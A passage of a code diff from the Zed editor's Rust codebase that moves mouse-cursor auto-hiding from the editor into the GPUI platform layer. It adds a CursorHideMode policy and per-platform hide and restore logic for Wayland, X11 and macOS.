SelectionHistoryMode::Undoing; self.with_selection_effects_deferred(window, cx, |this, window, cx| { @@ -18198,7 +18028,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); if let Some(entry) = self.selection_history.redo_stack.pop_back() { self.selection_history.mode = SelectionHistoryMode::Redoing; self.with_selection_effects_deferred(window, cx, |this, window, cx| { @@ -18386,7 +18215,6 @@ impl Editor { if !self.diagnostics_enabled() { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.go_to_diagnostic_impl(Direction::Next, action.severity, window, cx) } @@ -18399,7 +18227,6 @@ impl Editor { if !self.diagnostics_enabled() { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.go_to_diagnostic_impl(Direction::Prev, action.severity, window, cx) } @@ -18497,7 +18324,6 @@ impl Editor { } pub fn go_to_next_hunk(&mut self, _: &GoToHunk, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); let snapshot = self.snapshot(window, cx); let selection = self.selections.newest::(&self.display_snapshot(cx)); self.go_to_hunk_before_or_after_position( @@ -18566,7 +18392,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); let snapshot = self.snapshot(window, cx); let selection = self.selections.newest::(&snapshot.display_snapshot); self.go_to_hunk_before_or_after_position( @@ -18660,7 +18485,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); let snapshot = self.snapshot(window, cx); let buffer = &snapshot.buffer_snapshot(); let position = self @@ -20180,7 +20004,6 @@ impl Editor { if self.read_only(cx) { return None; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let project = match &self.project { Some(project) => project.clone(), @@ -20205,7 +20028,6 @@ impl Editor { if self.read_only(cx) { return None; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let project = match &self.project { Some(project) => project.clone(), @@ -20327,7 +20149,6 @@ impl Editor { if self.read_only(cx) { return None; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let project = match &self.project { Some(project) => project.clone(), None => return None, @@ -21911,7 +21732,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let buffers = self.buffer.read(cx).all_buffers(); for branch_buffer in buffers { @@ -21944,7 +21764,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let snapshot = self.snapshot(window, cx); let hunks = snapshot.hunks_for_ranges( self.selections @@ -24284,7 +24103,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.transact(window, cx, |this, window, cx| { let edits = this .selections @@ -25363,7 +25181,6 @@ impl Editor { self.scroll_manager.vertical_scroll_margin = editor_settings.vertical_scroll_margin; self.show_breadcrumbs = editor_settings.toolbar.breadcrumbs; self.cursor_shape = editor_settings.cursor_shape.unwrap_or_default(); - self.hide_mouse_mode = editor_settings.hide_mouse.unwrap_or_default(); } if old_cursor_shape != self.cursor_shape { @@ -26021,8 +25838,8 @@ impl Editor { } }); - if let Some(position_map) = self.last_position_map.clone() - && !self.mouse_cursor_hidden + if cx.is_cursor_visible() + && let Some(position_map) = self.last_position_map.clone() { EditorElement::mouse_moved( self, diff --git a/crates/editor/src/editor_settings.rs b/crates/editor/src/editor_settings.rs index 1999d0e537e525..0c39196062b08a 100644 --- a/crates/editor/src/editor_settings.rs +++ b/crates/editor/src/editor_settings.rs @@ -6,9 +6,8 @@ use project::project_settings::DiagnosticSeverity; pub use settings::{ CodeLens, CompletionDetailAlignment, CurrentLineHighlight, DelayMs, DiffViewStyle, DisplayIn, DocumentColorsRenderMode, DoubleClickInMultibuffer, GoToDefinitionFallback, - GoToDefinitionScrollStrategy, HideMouseMode, MinimapThumb, MinimapThumbBorder, - MultiCursorModifier, ScrollBeyondLastLine, ScrollbarDiagnostics, SeedQuerySetting, ShowMinimap, - SnippetSortOrder, + GoToDefinitionScrollStrategy, MinimapThumb, MinimapThumbBorder, MultiCursorModifier, + ScrollBeyondLastLine, ScrollbarDiagnostics, SeedQuerySetting, ShowMinimap, SnippetSortOrder, }; use settings::{RegisterSetting, RelativeLineNumbers, Settings}; use ui::scrollbars::ShowScrollbar; @@ -55,7 +54,6 @@ pub struct EditorSettings { pub go_to_definition_fallback: GoToDefinitionFallback, pub go_to_definition_scroll_strategy: GoToDefinitionScrollStrategy, pub jupyter: Jupyter, - pub hide_mouse: Option, pub snippet_sort_order: SnippetSortOrder, pub diagnostics_max_severity: Option, pub inline_code_actions: bool, @@ -291,7 +289,6 @@ impl Settings for EditorSettings { jupyter: Jupyter { enabled: editor.jupyter.unwrap().enabled.unwrap(), }, - hide_mouse: editor.hide_mouse, snippet_sort_order: editor.snippet_sort_order.unwrap(), diagnostics_max_severity: editor.diagnostics_max_severity.map(Into::into), inline_code_actions: editor.inline_code_actions.unwrap(), diff --git a/crates/editor/src/element.rs b/crates/editor/src/element.rs index 69a829e578b45f..a8c0d443d7e0cf 100644 --- a/crates/editor/src/element.rs +++ b/crates/editor/src/element.rs @@ -1262,7 +1262,6 @@ impl EditorElement { let text_hovered = text_hitbox.is_hovered(window); let gutter_hovered = gutter_hitbox.is_hovered(window); editor.set_gutter_hovered(gutter_hovered, cx); - editor.show_mouse_cursor(cx); let point_for_position = position_map.point_for_position(event.position); let valid_point = point_for_position.nearest_valid; @@ -6607,9 +6606,7 @@ impl EditorElement { }), |window| { let editor = self.editor.read(cx); - if editor.mouse_cursor_hidden { - window.set_window_cursor_style(CursorStyle::None); - } else if let SelectionDragState::ReadyToDrag { + if let SelectionDragState::ReadyToDrag { mouse_down_time, .. } = &editor.selection_drag_state { diff --git a/crates/editor/src/hover_links.rs b/crates/editor/src/hover_links.rs index e00fd20ed5abdc..1877d8704f6a7b 100644 --- a/crates/editor/src/hover_links.rs +++ b/crates/editor/src/hover_links.rs @@ -120,7 +120,12 @@ impl Editor { cx: &mut Context, ) { let hovered_link_modifier = Editor::is_cmd_or_ctrl_pressed(&modifiers, cx); - if !hovered_link_modifier || self.has_pending_selection() || self.mouse_cursor_hidden { + if !hovered_link_modifier || self.has_pending_selection() { + self.hide_hovered_link(cx); + return; + } + + if !cx.is_cursor_visible() { self.hide_hovered_link(cx); return; } @@ -782,7 +787,7 @@ fn surrounding_filename( mod tests { use super::*; use crate::{ - DisplayPoint, HideMouseCursorOrigin, + DisplayPoint, display_map::ToDisplayPoint, editor_tests::init_test, inlays::inlay_hints::tests::{cached_hint_labels, visible_hint_labels}, @@ -1413,29 +1418,6 @@ mod tests { Let's test a [complex](«https://zed.dev/channel/ˇ») case. "}, ); - - // Cursor hidden with secondary key - let screen_coord = cx.pixel_position(indoc! {" - Let's test a [complex](https://zed.dev/ˇchannel/) case. - "}); - cx.simulate_mouse_move(screen_coord, None, Modifiers::none()); - cx.update_editor(|editor, _, cx| { - editor.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); - }); - cx.simulate_modifiers_change(Modifiers::secondary_key()); - assert_no_highlight!(cx); - - // Cursor active again - let screen_coord = cx.pixel_position(indoc! {" - Let's test a [complex](https://ˇzed.dev/channel/) case. - "}); - cx.simulate_mouse_move(screen_coord, None, Modifiers::secondary_key()); - cx.assert_editor_text_highlights( - HighlightKey::HoveredLinkState, - indoc! {" - Let's test a [complex](«https://zed.dev/channel/ˇ») case. - "}, - ); } #[gpui::test] diff --git a/crates/gpui/src/app.rs b/crates/gpui/src/app.rs index f19c780caa671d..a9255898daa526 100644 --- a/crates/gpui/src/app.rs +++ b/crates/gpui/src/app.rs @@ -257,6 +257,22 @@ pub enum QuitMode { Explicit, } +/// Controls when GPUI hides the mouse cursor in response to keyboard input. +/// +/// Restoration on mouse motion is handled by the platform layer; this enum +/// only describes the policy for *triggering* a hide. +#[derive(Copy, Clone, Debug, Default, PartialEq, Eq)] +pub enum CursorHideMode { + /// Never hide the cursor automatically. + Never, + /// Hide on character-producing key presses (typing). + OnTyping, + /// Hide on character-producing key presses, *and* when a key binding + /// resolves to an action that consumes the keystroke. + #[default] + OnTypingAndAction, +} + #[doc(hidden)] #[derive(Clone, PartialEq, Eq)] pub struct SystemWindowTab { @@ -649,6 +665,7 @@ pub struct App { pub(crate) window_update_stack: Vec, pub(crate) mode: GpuiMode, + pub(crate) cursor_hide_mode: CursorHideMode, flushing_effects: bool, pending_updates: usize, quit_mode: QuitMode, @@ -737,6 +754,7 @@ impl App { inspector_element_registry: InspectorElementRegistry::default(), quit_mode: QuitMode::default(), quitting: false, + cursor_hide_mode: CursorHideMode::default(), #[cfg(any(test, feature = "test-support", debug_assertions))] name: None, @@ -877,6 +895,27 @@ impl App { self.platform.quit(); } + /// Returns the current policy for hiding the cursor in response to + /// keyboard input. + pub fn cursor_hide_mode(&self) -> CursorHideMode { + self.cursor_hide_mode + } + + /// Sets the policy controlling when GPUI hides the cursor in response + /// to keyboard input. + pub fn set_cursor_hide_mode(&mut self, mode: CursorHideMode) { + self.cursor_hide_mode = mode; + } + + /// Returns whether the cursor is currently visible according to the + /// platform. This will report `false` after a keyboard input has hidden + /// the cursor and the user has not yet moved the mouse to restore it. + /// + /// See [`App::set_cursor_hide_mode`]. + pub fn is_cursor_visible(&self) -> bool { + self.platform.is_cursor_visible() + } + /// Schedules all windows in the application to be redrawn. This can be called /// multiple times in an update cycle and still result in a single redraw. pub fn refresh_windows(&mut self) { diff --git a/crates/gpui/src/platform.rs b/crates/gpui/src/platform.rs index ac36f05c425d6a..a00d158bc51704 100644 --- a/crates/gpui/src/platform.rs +++ b/crates/gpui/src/platform.rs @@ -212,6 +212,14 @@ pub trait Platform: 'static { fn path_for_auxiliary_executable(&self, name: &str) -> Result; fn set_cursor_style(&self, style: CursorStyle); + + /// Hides the mouse cursor until the user moves the mouse over one of + /// this application's windows. + fn hide_cursor_until_mouse_moves(&self); + + /// Returns whether the mouse cursor is currently visible. + fn is_cursor_visible(&self) -> bool; + fn should_auto_hide_scrollbars(&self) -> bool; fn read_from_clipboard(&self) -> Option; @@ -1818,9 +1826,6 @@ pub enum CursorStyle { /// A cursor indicating that the operation will result in a context menu /// corresponds to the CSS cursor value `context-menu` ContextualMenu, - - /// Hide the cursor - None, } /// A clipboard item that should be copied to the clipboard diff --git a/crates/gpui/src/platform/test/platform.rs b/crates/gpui/src/platform/test/platform.rs index a59b21f038a01b..cc8c5749bd4696 100644 --- a/crates/gpui/src/platform/test/platform.rs +++ b/crates/gpui/src/platform/test/platform.rs @@ -403,6 +403,12 @@ impl Platform for TestPlatform { *self.active_cursor.lock() = style; } + fn hide_cursor_until_mouse_moves(&self) {} + + fn is_cursor_visible(&self) -> bool { + true + } + fn should_auto_hide_scrollbars(&self) -> bool { false } diff --git a/crates/gpui/src/platform/visual_test.rs b/crates/gpui/src/platform/visual_test.rs index 8b9bec7edd170b..3719a3ee24f9eb 100644 --- a/crates/gpui/src/platform/visual_test.rs +++ b/crates/gpui/src/platform/visual_test.rs @@ -202,6 +202,14 @@ impl Platform for VisualTestPlatform { self.platform.set_cursor_style(style) } + fn hide_cursor_until_mouse_moves(&self) { + self.platform.hide_cursor_until_mouse_moves(); + } + + fn is_cursor_visible(&self) -> bool { + self.platform.is_cursor_visible() + } + fn should_auto_hide_scrollbars(&self) -> bool { self.platform.should_auto_hide_scrollbars() } diff --git a/crates/gpui/src/window.rs b/crates/gpui/src/window.rs index ad8bb0f735d5d4..dc387c67f39817 100644 --- a/crates/gpui/src/window.rs +++ b/crates/gpui/src/window.rs @@ -3,21 +3,22 @@ use crate::Inspector; use crate::{ Action, AnyDrag, AnyElement, AnyImageCache, AnyTooltip, AnyView, App, AppContext, Arena, Asset, AsyncWindowContext, AvailableSpace, Background, BorderStyle, Bounds, BoxShadow, Capslock, - Context, Corners, CursorStyle, Decorations, DevicePixels, DispatchActionListener, - DispatchNodeId, DispatchTree, DisplayId, Edges, Effect, Entity, EntityId, EventEmitter, - FileDropEvent, FontId, Global, GlobalElementId, GlyphId, GpuSpecs, Hsla, InputHandler, IsZero, - KeyBinding, KeyContext, KeyDownEvent, KeyEvent, Keystroke, KeystrokeEvent, LayoutId, - LineLayoutIndex, Modifiers, ModifiersChangedEvent, MonochromeSprite, MouseButton, MouseEvent, - MouseMoveEvent, MouseUpEvent, Path, Pixels, PlatformAtlas, PlatformDisplay, PlatformInput, - PlatformInputHandler, PlatformWindow, Point, PolychromeSprite, Priority, PromptButton, - PromptLevel, Quad, Render, RenderGlyphParams, RenderImage, RenderImageParams, RenderSvgParams, - Replay, ResizeEdge, SMOOTH_SVG_SCALE_FACTOR, SUBPIXEL_VARIANTS_X, SUBPIXEL_VARIANTS_Y, - ScaledPixels, Scene, Shadow, SharedString, Size, StrikethroughStyle, Style, SubpixelSprite, - SubscriberSet, Subscription, SystemWindowTab, SystemWindowTabController, TabStopMap, - TaffyLayoutEngine, Task, TextRenderingMode, TextStyle, TextStyleRefinement, ThermalState, - TransformationMatrix, Underline, UnderlineStyle, WindowAppearance, WindowBackgroundAppearance, - WindowBounds, WindowControls, WindowDecorations, WindowOptions, WindowParams, WindowTextSystem, - point, prelude::*, px, rems, size, transparent_black, + Context, Corners, CursorHideMode, CursorStyle, Decorations, DevicePixels, + DispatchActionListener, DispatchNodeId, DispatchTree, DisplayId, Edges, Effect, Entity, + EntityId, EventEmitter, FileDropEvent, FontId, Global, GlobalElementId, GlyphId, GpuSpecs, + Hsla, InputHandler, IsZero, KeyBinding, KeyContext, KeyDownEvent, KeyEvent, Keystroke, + KeystrokeEvent, LayoutId, LineLayoutIndex, Modifiers, ModifiersChangedEvent, MonochromeSprite, + MouseButton, MouseEvent, MouseMoveEvent, MouseUpEvent, Path, Pixels, PlatformAtlas, + PlatformDisplay, PlatformInput, PlatformInputHandler, PlatformWindow, Point, PolychromeSprite, + Priority, PromptButton, PromptLevel, Quad, Render, RenderGlyphParams, RenderImage, + RenderImageParams, RenderSvgParams, Replay, ResizeEdge, SMOOTH_SVG_SCALE_FACTOR, + SUBPIXEL_VARIANTS_X, SUBPIXEL_VARIANTS_Y, ScaledPixels, Scene, Shadow, SharedString, Size, + StrikethroughStyle, Style, SubpixelSprite, SubscriberSet, Subscription, SystemWindowTab, + SystemWindowTabController, TabStopMap, TaffyLayoutEngine, Task, TextRenderingMode, TextStyle, + TextStyleRefinement, ThermalState, TransformationMatrix, Underline, UnderlineStyle, + WindowAppearance, WindowBackgroundAppearance, WindowBounds, WindowControls, WindowDecorations, + WindowOptions, WindowParams, WindowTextSystem, point, prelude::*, px, rems, size, + transparent_black, }; use anyhow::{Context as _, Result, anyhow}; use collections::{FxHashMap, FxHashSet}; @@ -1457,10 +1458,6 @@ impl Window { move |active| { handle .update(&mut cx, |_, window, cx| { - if !active { - cx.platform.set_cursor_style(CursorStyle::Arrow); - } - window.active.set(active); window.modifiers = window.platform_window.modifiers(); window.capslock = window.platform_window.capslock(); @@ -4473,6 +4470,14 @@ impl Window { } else if let Some(key_down_event) = event.downcast_ref::() { self.pending_modifier.saw_keystroke = true; keystroke = Some(key_down_event.keystroke.clone()); + if key_down_event.keystroke.key_char.is_some() + && matches!( + cx.cursor_hide_mode, + CursorHideMode::OnTyping | CursorHideMode::OnTypingAndAction + ) + { + cx.platform.hide_cursor_until_mouse_moves(); + } } let Some(keystroke) = keystroke else { @@ -4738,6 +4743,22 @@ impl Window { node_id: DispatchNodeId, action: &dyn Action, cx: &mut App, + ) { + self.dispatch_action_on_node_inner(node_id, action, cx); + + if !cx.propagate_event + && cx.cursor_hide_mode == CursorHideMode::OnTypingAndAction + && self.last_input_was_keyboard() + { + cx.platform.hide_cursor_until_mouse_moves(); + } + } + + fn dispatch_action_on_node_inner( + &mut self, + node_id: DispatchNodeId, + action: &dyn Action, + cx: &mut App, ) { let dispatch_path = self.rendered_frame.dispatch_tree.dispatch_path(node_id); diff --git a/crates/gpui_linux/src/linux/platform.rs b/crates/gpui_linux/src/linux/platform.rs index e3c947bcb9d333..343600cd862f45 100644 --- a/crates/gpui_linux/src/linux/platform.rs +++ b/crates/gpui_linux/src/linux/platform.rs @@ -80,6 +80,10 @@ pub(crate) trait LinuxClient { options: WindowParams, ) -> anyhow::Result>; fn set_cursor_style(&self, style: CursorStyle); + fn hide_cursor_until_mouse_moves(&self) {} + fn is_cursor_visible(&self) -> bool { + true + } fn open_uri(&self, uri: &str); fn reveal_path(&self, path: PathBuf); fn write_to_primary(&self, item: ClipboardItem); @@ -530,6 +534,14 @@ impl Platform for LinuxPlatform

{ self.inner.set_cursor_style(style) } + fn hide_cursor_until_mouse_moves(&self) { + self.inner.hide_cursor_until_mouse_moves() + } + + fn is_cursor_visible(&self) -> bool { + self.inner.is_cursor_visible() + } + fn should_auto_hide_scrollbars(&self) -> bool { self.inner.with_common(|common| common.auto_hide_scrollbars) } @@ -776,12 +788,6 @@ pub(super) fn cursor_style_to_icon_names(style: CursorStyle) -> &'static [&'stat CursorStyle::DragLink => &["alias"], CursorStyle::DragCopy => &["copy"], CursorStyle::ContextualMenu => &["context-menu"], - CursorStyle::None => { - #[cfg(debug_assertions)] - panic!("CursorStyle::None should be handled separately in the client"); - #[cfg(not(debug_assertions))] - &[DEFAULT_CURSOR_ICON_NAME] - } } } diff --git a/crates/gpui_linux/src/linux/wayland.rs b/crates/gpui_linux/src/linux/wayland.rs index aa1e7974043419..3e90688d1bd98b 100644 --- a/crates/gpui_linux/src/linux/wayland.rs +++ b/crates/gpui_linux/src/linux/wayland.rs @@ -37,11 +37,5 @@ pub(super) fn to_shape(style: CursorStyle) -> Shape { CursorStyle::DragLink => Shape::Alias, CursorStyle::DragCopy => Shape::Copy, CursorStyle::ContextualMenu => Shape::ContextMenu, - CursorStyle::None => { - #[cfg(debug_assertions)] - panic!("CursorStyle::None should be handled separately in the client"); - #[cfg(not(debug_assertions))] - Shape::Default - } } } diff --git a/crates/gpui_linux/src/linux/wayland/client.rs b/crates/gpui_linux/src/linux/wayland/client.rs index f91efa53e8d391..5edd9477b33878 100644 --- a/crates/gpui_linux/src/linux/wayland/client.rs +++ b/crates/gpui_linux/src/linux/wayland/client.rs @@ -256,6 +256,7 @@ pub(crate) struct WaylandClientState { keyboard_focused_window: Option, loop_handle: LoopHandle<'static, WaylandClientStatePtr>, cursor_style: Option, + cursor_hidden_window: Option, clipboard: Clipboard, data_offers: Vec>, primary_data_offer: Option>, @@ -410,6 +411,65 @@ impl WaylandClientStatePtr { { state.keyboard_focused_window = Some(window); } + if let Some(window) = state.cursor_hidden_window.take() + && !window.ptr_eq(&closed_window) + { + state.cursor_hidden_window = Some(window); + } + } +} + +impl WaylandClientState { + fn hide_cursor_until_mouse_moves(&mut self) { + if self.cursor_hidden_window.is_some() { + return; + } + let Some(focused_window) = self.mouse_focused_window.clone() else { + // No surface to apply the hidden cursor to. + return; + }; + let Some(wl_pointer) = self.wl_pointer.clone() else { + // Seat lost its pointer capability; nothing to hide. + return; + }; + let serial = self.serial_tracker.get(SerialKind::MouseEnter); + wl_pointer.set_cursor(serial, None, 0, 0); + self.cursor_hidden_window = Some(focused_window); + } + + fn restore_cursor_after_hide(&mut self) { + if self.cursor_hidden_window.take().is_none() { + return; + } + let Some(style) = self.cursor_style else { + return; + }; + let serial = self.serial_tracker.get(SerialKind::MouseEnter); + if let Some(cursor_shape_device) = &self.cursor_shape_device { + cursor_shape_device.set_shape(serial, to_shape(style)); + return; + } + let Some(focused_window) = self.mouse_focused_window.clone() else { + log::warn!( + "wayland: no focused surface to restore cursor style {:?} after hide; cursor may stay invisible", + style + ); + return; + }; + let Some(wl_pointer) = self.wl_pointer.clone() else { + log::warn!( + "wayland: no wl_pointer to restore cursor style {:?} after hide; cursor may stay invisible", + style + ); + return; + }; + let scale = focused_window.primary_output_scale(); + self.cursor.set_icon( + &wl_pointer, + serial, + cursor_style_to_icon_names(style), + scale, + ); } } @@ -665,6 +725,7 @@ impl WaylandClient { loop_handle: handle.clone(), enter_token: None, cursor_style: None, + cursor_hidden_window: None, clipboard: Clipboard::new(conn.clone(), handle.clone()), data_offers: Vec::new(), primary_data_offer: None, @@ -785,35 +846,44 @@ impl LinuxClient for WaylandClient { .as_ref() .is_some_and(|w| !w.is_blocked())); - if need_update { - let serial = state.serial_tracker.get(SerialKind::MouseEnter); - state.cursor_style = Some(style); - - if let CursorStyle::None = style { - let wl_pointer = state - .wl_pointer - .clone() - .expect("window is focused by pointer"); - wl_pointer.set_cursor(serial, None, 0, 0); - } else if let Some(cursor_shape_device) = &state.cursor_shape_device { - cursor_shape_device.set_shape(serial, to_shape(style)); - } else if let Some(focused_window) = &state.mouse_focused_window { - // cursor-shape-v1 isn't supported, set the cursor using a surface. - let wl_pointer = state - .wl_pointer - .clone() - .expect("window is focused by pointer"); - let scale = focused_window.primary_output_scale(); - state.cursor.set_icon( - &wl_pointer, - serial, - cursor_style_to_icon_names(style), - scale, - ); - } + if !need_update { + return; + } + + state.cursor_style = Some(style); + + // Don't clobber the invisible cursor; restore reads back from `cursor_style`. + if state.cursor_hidden_window.is_some() { + return; + } + + let serial = state.serial_tracker.get(SerialKind::MouseEnter); + if let Some(cursor_shape_device) = &state.cursor_shape_device { + cursor_shape_device.set_shape(serial, to_shape(style)); + } else if let Some(focused_window) = &state.mouse_focused_window { + // cursor-shape-v1 isn't supported, set the cursor using a surface. + let wl_pointer = state + .wl_pointer + .clone() + .expect("window is focused by pointer"); + let scale = focused_window.primary_output_scale(); + state.cursor.set_icon( + &wl_pointer, + serial, + cursor_style_to_icon_names(style), + scale, + ); } } + fn hide_cursor_until_mouse_moves(&self) { + self.0.borrow_mut().hide_cursor_until_mouse_moves(); + } + + fn is_cursor_visible(&self) -> bool { + self.0.borrow().cursor_hidden_window.is_none() + } + fn open_uri(&self, uri: &str) { let mut state = self.0.borrow_mut(); if let (Some(activation), Some(window)) = ( @@ -1432,6 +1502,7 @@ impl Dispatch for WaylandClientStatePtr { state.enter_token.take(); // Prevent keyboard events from repeating after opening e.g. a file chooser and closing it quickly state.repeat.current_id += 1; + state.restore_cursor_after_hide(); if let Some(window) = keyboard_focused_window { if let Some(ref mut compose) = state.compose_state { @@ -1732,14 +1803,9 @@ impl Dispatch for WaylandClientStatePtr { if state.enter_token.is_some() { state.enter_token = None; } + state.restore_cursor_after_hide(); if let Some(style) = state.cursor_style { - if let CursorStyle::None = style { - let wl_pointer = state - .wl_pointer - .clone() - .expect("window is focused by pointer"); - wl_pointer.set_cursor(serial, None, 0, 0); - } else if let Some(cursor_shape_device) = &state.cursor_shape_device { + if let Some(cursor_shape_device) = &state.cursor_shape_device { cursor_shape_device.set_shape(serial, to_shape(style)); } else { let scale = window.primary_output_scale(); @@ -1765,6 +1831,7 @@ impl Dispatch for WaylandClientStatePtr { state.mouse_focused_window = None; state.mouse_location = None; state.button_pressed = None; + state.cursor_hidden_window = None; drop(state); focused_window.handle_input(input); @@ -1780,6 +1847,7 @@ impl Dispatch for WaylandClientStatePtr { return; } state.mouse_location = Some(point(px(surface_x as f32), px(surface_y as f32))); + state.restore_cursor_after_hide(); if let Some(window) = state.mouse_focused_window.clone() { if window.is_blocked() { diff --git a/crates/gpui_linux/src/linux/x11/client.rs b/crates/gpui_linux/src/linux/x11/client.rs index 03272a99051aa7..bedd3c3e2973e0 100644 --- a/crates/gpui_linux/src/linux/x11/client.rs +++ b/crates/gpui_linux/src/linux/x11/client.rs @@ -211,6 +211,8 @@ pub struct X11ClientState { pub(crate) cursor_handle: cursor::Handle, pub(crate) cursor_styles: HashMap, pub(crate) cursor_cache: HashMap>, + pub(crate) invisible_cursor_cache: Option, + pub(crate) cursor_hidden_window: Option, pointer_device_states: BTreeMap, @@ -249,6 +251,9 @@ impl X11ClientStatePtr { if state.keyboard_focused_window == Some(x_window) { state.keyboard_focused_window = None; } + if state.cursor_hidden_window == Some(x_window) { + state.cursor_hidden_window = None; + } state.cursor_styles.remove(&x_window); } @@ -543,6 +548,8 @@ impl X11Client { cursor_handle, cursor_styles: HashMap::default(), cursor_cache: HashMap::default(), + cursor_hidden_window: None, + invisible_cursor_cache: None, pointer_device_states, @@ -971,6 +978,7 @@ impl X11Client { compose_state.reset(); } state.pre_edit_text.take(); + state.restore_cursor_after_hide(); drop(state); self.reset_ime(); window.handle_ime_delete(); @@ -1224,6 +1232,7 @@ impl X11Client { Event::XinputMotion(event) => { let window = self.get_window(event.event)?; let mut state = self.0.borrow_mut(); + state.restore_cursor_after_hide(); if window.is_blocked() { // We want to set the cursor to the default arrow // when the window is blocked @@ -1286,6 +1295,7 @@ impl X11Client { window.set_hovered(true); let mut state = self.0.borrow_mut(); state.mouse_focused_window = Some(event.event); + state.restore_cursor_after_hide(); } Event::XinputLeave(event) if event.mode == xinput::NotifyMode::NORMAL => { let mut state = self.0.borrow_mut(); @@ -1667,11 +1677,17 @@ impl LinuxClient for X11Client { return; } + state.cursor_styles.insert(focused_window, style); + + // Don't clobber the invisible cursor; restore reads back from `cursor_styles`. + if state.cursor_hidden_window == Some(focused_window) { + return; + } + let Some(cursor) = state.get_cursor_icon(style) else { return; }; - state.cursor_styles.insert(focused_window, style); check_reply( || "Failed to set cursor style", state.xcb_connection.change_window_attributes( @@ -1686,6 +1702,14 @@ impl LinuxClient for X11Client { state.xcb_connection.flush().log_err(); } + fn hide_cursor_until_mouse_moves(&self) { + self.0.borrow_mut().hide_cursor_until_mouse_moves(); + } + + fn is_cursor_visible(&self) -> bool { + self.0.borrow().cursor_hidden_window.is_none() + } + fn open_uri(&self, uri: &str) { #[cfg(any(feature = "wayland", feature = "x11"))] open_uri_internal( @@ -1986,42 +2010,34 @@ impl X11ClientState { return *cursor; } - let result; - match style { - CursorStyle::None => match create_invisible_cursor(&self.xcb_connection) { - Ok(loaded_cursor) => result = Ok(loaded_cursor), - Err(err) => result = Err(err.context("X11: error while creating invisible cursor")), - }, - _ => 'outer: { - let mut errors = String::new(); - let cursor_icon_names = cursor_style_to_icon_names(style); - for cursor_icon_name in cursor_icon_names { - match self - .cursor_handle - .load_cursor(&self.xcb_connection, cursor_icon_name) - { - Ok(loaded_cursor) => { - if loaded_cursor != x11rb::NONE { - result = Ok(loaded_cursor); - break 'outer; - } - } - Err(err) => { - errors.push_str(&err.to_string()); - errors.push('\n'); + let result = 'outer: { + let mut errors = String::new(); + let cursor_icon_names = cursor_style_to_icon_names(style); + for cursor_icon_name in cursor_icon_names { + match self + .cursor_handle + .load_cursor(&self.xcb_connection, cursor_icon_name) + { + Ok(loaded_cursor) => { + if loaded_cursor != x11rb::NONE { + break 'outer Ok(loaded_cursor); } } - } - if errors.is_empty() { - result = Err(anyhow!( - "errors while loading cursor icons {:?}:\n{}", - cursor_icon_names, - errors - )); - } else { - result = Err(anyhow!("did not find cursor icons {:?}", cursor_icon_names)); + Err(err) => { + errors.push_str(&err.to_string()); + errors.push('\n'); + } } } + if errors.is_empty() { + Err(anyhow!( + "errors while loading cursor icons {:?}:\n{}", + cursor_icon_names, + errors + )) + } else { + Err(anyhow!("did not find cursor icons {:?}", cursor_icon_names)) + } }; let cursor = match result { @@ -2052,6 +2068,73 @@ impl X11ClientState { self.cursor_cache.insert(style, cursor); cursor } + + fn get_or_create_invisible_cursor(&mut self) -> Option { + if let Some(cursor) = self.invisible_cursor_cache { + return Some(cursor); + } + let cursor = create_invisible_cursor(&self.xcb_connection) + .context("X11: error while creating invisible cursor") + .log_err()?; + self.invisible_cursor_cache = Some(cursor); + Some(cursor) + } + + fn hide_cursor_until_mouse_moves(&mut self) { + if self.cursor_hidden_window.is_some() { + return; + } + let Some(focused_window) = self.mouse_focused_window else { + // No window to apply the per-window invisible cursor to. + return; + }; + let Some(invisible_cursor) = self.get_or_create_invisible_cursor() else { + return; + }; + check_reply( + || "Failed to hide cursor", + self.xcb_connection.change_window_attributes( + focused_window, + &ChangeWindowAttributesAux { + cursor: Some(invisible_cursor), + ..Default::default() + }, + ), + ) + .log_err(); + self.xcb_connection.flush().log_err(); + self.cursor_hidden_window = Some(focused_window); + } + + fn restore_cursor_after_hide(&mut self) { + let Some(hidden_window) = self.cursor_hidden_window.take() else { + return; + }; + let style = self + .cursor_styles + .get(&hidden_window) + .copied() + .unwrap_or(CursorStyle::Arrow); + let Some(cursor) = self.get_cursor_icon(style) else { + log::warn!( + "X11: no cursor icon available to restore {:?} after hide; cursor may stay invisible", + style + ); + return; + }; + check_reply( + || "Failed to restore cursor style after hide", + self.xcb_connection.change_window_attributes( + hidden_window, + &ChangeWindowAttributesAux { + cursor: Some(cursor), + ..Default::default() + }, + ), + ) + .log_err(); + self.xcb_connection.flush().log_err(); + } } // Adapted from: diff --git a/crates/gpui_macos/src/platform.rs b/crates/gpui_macos/src/platform.rs index fefe957bb25bad..77cf85a8d1d340 100644 --- a/crates/gpui_macos/src/platform.rs +++ b/crates/gpui_macos/src/platform.rs @@ -52,7 +52,10 @@ use std::{ ptr, rc::Rc, slice, str, - sync::{Arc, OnceLock, atomic::AtomicBool}, + sync::{ + Arc, OnceLock, + atomic::{AtomicBool, Ordering}, + }, }; use util::{ ResultExt, @@ -179,7 +182,8 @@ pub(crate) struct MacPlatformState { dock_menu: Option, menus: Option>, keyboard_mapper: Rc, - cursor_hidden: Arc, + /// Mirrors `[NSCursor setHiddenUntilMouseMoves:]` state, which AppKit doesn't expose. + cursor_visible: Arc, } impl MacPlatform { @@ -216,7 +220,7 @@ impl MacPlatform { on_thermal_state_change: None, menus: None, keyboard_mapper, - cursor_hidden: 